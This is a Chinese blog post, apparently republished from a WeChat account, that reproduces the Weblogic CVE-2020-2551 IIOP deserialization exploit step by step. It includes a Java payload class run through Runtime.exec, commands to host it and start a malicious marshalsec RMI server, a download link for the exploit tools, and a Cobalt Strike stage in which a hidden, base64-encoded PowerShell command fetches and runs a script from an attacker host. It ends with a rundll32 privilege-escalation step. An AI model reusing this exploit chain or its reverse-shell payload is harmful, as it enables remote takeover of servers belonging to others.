前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Weblogic CVE-2020-2551漏洞复现&CS实战利用

Weblogic CVE-2020-2551漏洞复现&CS实战利用

作者头像
HACK学习
发布2021-01-04 10:11:57
4K0
发布2021-01-04 10:11:57
举报
文章被收录于专栏:HACK学习HACK学习

Weblogic CVE-2020-2551漏洞复现

Weblogic IIOP 反序列化

漏洞原理

https://www.anquanke.com/post/id/199227#h3-7 https://www.cnblogs.com/tr1ple/p/12483235.html

漏洞复现

Weblogic CVE-2020-2551复现过程

靶机:windows7系统

IP地址:192.168.43.20

攻击机:windows10系统

IP地址:192.168.43.38

•工具下载地址https://pan.baidu.com/s/1N9oW3PtJJpkGC-W-LkgW9A 提取码:03vx

代码语言:javascript
复制
exp.java
marshalsec-0.0.3-SNAPSHOT-all.jar
weblogic_CVE_2020_2551.jar
  • exp.java源代码
代码语言:javascript
复制
import java.io.IOException;
public class exp {
  static{
    try {
      java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
  public static void main(String[] args) {
    
  }
}
  • 1、在exp.java中修改执行的命令,编译生成exp.class
代码语言:javascript
复制
javac exp.java -source 1.6 -target 1.6
  • 2、用python启动一个web服务,需要与exp.class在同一文件夹
代码语言:javascript
复制
python -m SimpleHTTPServer 80
python3 -m http.server 80
  • 3、使用marshalsec起一个恶意的RMI服务
代码语言:javascript
复制
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.43.38/#exp" 1099

  • 4、利用漏洞攻击使目标弹出计算器
代码语言:javascript
复制
java -jar weblogic_CVE_2020_2551.jar 192.168.43.20 7001 rmi://192.168.43.38:1099/exp
//java -jar weblogic_CVE_2020_2551.jar 靶机IP地址 靶机端口 RMI服务

Cobalt strike工具实战利用

反弹sehll

1、启动cs团队服务器、客户端,生成powershell运行后门命令

  • 2、修改powershell

Runtime.getRuntime().exec()函数解决

http://www.jackson-t.ca/runtime-exec-payloads.html

详情见Apache Shiro 反序列化漏洞复现(CVE-2016-4437)

https://www.cnblogs.com/renhaoblog/p/12971152.html

  • 3、编写exp.class脚本
代码语言:javascript
复制
import java.io.IOException;
public class exp {
  static{
    try {
      java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADMAOAA6ADgAMAAvAGEAJwApACkAIgA="});
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
  public static void main(String[] args) {
    
  }
}

•4、利用weblogic CVE-2020-2551漏洞反弹shell

rundll32.exe提权

•1、遇到创建用户失败,利用rundll32.exe进行用户提权

•2、用户创建成功

参考链接

Weblogic CVE-2020-2551复现

https://blog.csdn.net/weixin_44677409/article/details/106493733

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-12-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Weblogic CVE-2020-2551漏洞复现
    • 漏洞原理
      • 漏洞复现
        • Cobalt strike工具实战利用
          • 反弹sehll
            • rundll32.exe提权
            • 参考链接
            • 声明
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档